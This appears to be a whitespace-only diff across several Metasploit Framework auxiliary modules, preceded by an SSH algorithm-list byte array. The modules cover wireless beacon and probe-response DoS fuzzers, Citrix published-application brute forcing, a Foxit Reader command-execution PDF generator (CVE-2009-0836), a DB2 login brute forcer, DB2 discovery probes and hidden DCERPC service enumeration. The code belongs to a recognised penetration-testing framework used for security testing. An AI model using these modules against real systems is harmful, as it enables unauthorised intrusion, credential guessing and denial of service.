0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
[0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,
0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40,
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Beacon Frame Fuzzer',
'Description' => %q{
This module sends out corrupted beacon frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
], self.class)
end
def ping_check
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
frames.push(frame)
end
1.upto(3) do
1.upto(3) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
print_status f.inspect
end
return
end
end
end
else
else
wifi.write(frame)
end
end
@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
#"\x00\x05" + # capability flags
Rex::Text.rand_text(2) +
Rex::Text.rand_text(2) +
# ssid tag
"\x00" + ssid.length.chr + ssid +
@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Probe Response Frame Fuzzer',
'Description' => %q{
This module sends out corrupted probe response frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
end
def ping_check
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
frames.push(frame)
end
1.upto(10) do
1.upto(10) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
print_status f.inspect
end
return
end
end
end
else
else
wifi.write(frame)
end
end
@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capability flags
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
# ssid tag
frame << "\x00" + ssid.length.chr + ssid
# supported rates
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
# current channel
frame << "\x03" + "\x01" + channel.chr
1.upto(ies) do |i|
max = mtu - frame.length
break if max < 2
@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
]
))
@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
def run
connect_udp
print_status("Attempting to contact Citrix ICA service...")
client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'patrick' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ],
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
def run
connect_udp
print_status("Attempting to contact Citrix ICA service...")
client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:)
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary
application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application
application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary
packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"
packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00"
packet << client + "\x00"
udp_sock.put(packet)
res = udp_sock.get(3)
if (res[0,application_valid.length] == application_valid)
print_status("Found: #{application}")
end
if (res[0,application_invalid.length] == application_invalid)
print_error("NOT Found: #{application}")
end
end
else
print_error("Server did not respond.")
end


@ -1,9 +1,13 @@
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'zlib'
@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Foxit Reader Authorization Bypass',
'Description' => %q{
This module exploits a authorization bypass vulnerability in Foxit Reader
build 1120. When a attacker creates a specially crafted pdf file containing
a Open/Execute action, arbitrary commands can be executed without confirmation
from the victim.
build 1120. When a attacker creates a specially crafted pdf file containing
a Open/Execute action, arbitrary commands can be executed without confirmation
from the victim.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
'Version' => '$Revision$',
'References' =>
'References' =>
[
[ 'CVE', '2009-0836' ],
[ 'BID', '34035' ],
@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Mar 9 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
register_options(
[
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
end
@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
# Create the pdf
pdf = make_pdf(exec)
print_status("Creating '#{datastore['FILENAME']}' file...")
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
end
result
end
def ioDef(id)
"%d 0 obj" % id
end
@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary
def ioRef(id)
"%d 0 R" % id
end
def make_pdf(exec)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
# Randomize PDF version?
pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
pdf << "%" << RandomNonASCIIString(4) << eol


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,12 +14,12 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DB2
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DB2 Authentication Brute Force Utility',
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['todb'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]),
], self.class)
end
def run_host(ip)
@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary
begin
info = db2_check_login
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
return :abort
rescue ::Rex::Proto::DRDA::RespError => e
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
return :abort
end
disconnect


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DB2
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DB2 Probe Utility',
@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
verbose = datastore['VERBOSE']
begin
info = db2_probe(2)
if info[:excsatrd]
inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth]
report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}"
print_status("#{ip}:#{rport} DB2 - #{report_info}")
report_service(
:host => rhost,
:host => rhost,
:port => rport,
:name => "db2",
:info => report_info
)
end
disconnect
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
return :done
rescue ::Rex::Proto::DRDA::RespError => e
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
return :error
end
end


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
@ -8,11 +12,11 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'DB2 Discovery Service Detection.',
@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'MC' ],
'License' => MSF_LICENSE
)
register_options([Opt::RPORT(523),], self.class)
deregister_options('RHOST')
end
def run_host(ip)
pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00"
begin
@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
connect_udp
udp_sock.put(pkt)
res = udp_sock.read(1024).split(/\x00/)
if (res)
report_note(
:host => ip,
@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect_udp
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
rescue ::Errno::EPIPE
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Hidden DCERPC Service Discovery',
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module will query the endpoint mapper and make a list
of all ncacn_tcp RPC services. It will then connect to each of
these services and use the management API to list all other
these services and use the management API to list all other
RPC services accessible on this port. Any RPC service found attached
to a TCP port, but not listed in the endpoint mapper, will be displayed
and analyzed to see whether anonymous access is permitted.
@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'hdm',
'License' => MSF_LICENSE
)
deregister_options('RHOST', 'RPORT')
end
# Obtain information about a single host
def run_host(ip)
def run_host(ip)
begin
epm = dcerpc_endpoint_list()
@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary
print_status("Could not contact the endpoint mapper on #{ip}")
return
end
eports = {}
epm.each do |ep|
next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp")
eports[ep[:port]] ||= {}
eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true
end
eports.each_pair do |eport, servs|
rport = eport
print_status("Looking for services on #{ip}:#{rport}...")
ids = dcerpc_mgmt_inq_if_ids(rport)
return if not ids
ids.each do |id|
if (not servs.has_key?(id[0]+'_'+id[1]))
print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}")
conn = nil
bind = nil
call = nil
@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary
res = dcerpc.call(0, NDR.long(0) * 128)
call = true
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
data = dcerpc.last_response.stub_data
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
error = e.to_s
end
if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/)
call = true
end
status = "\t\t"
status << "CONN " if conn
status << "BIND " if bind
status << "CALL " if call
status << "DATA=#{data.unpack("H*")[0]} " if data
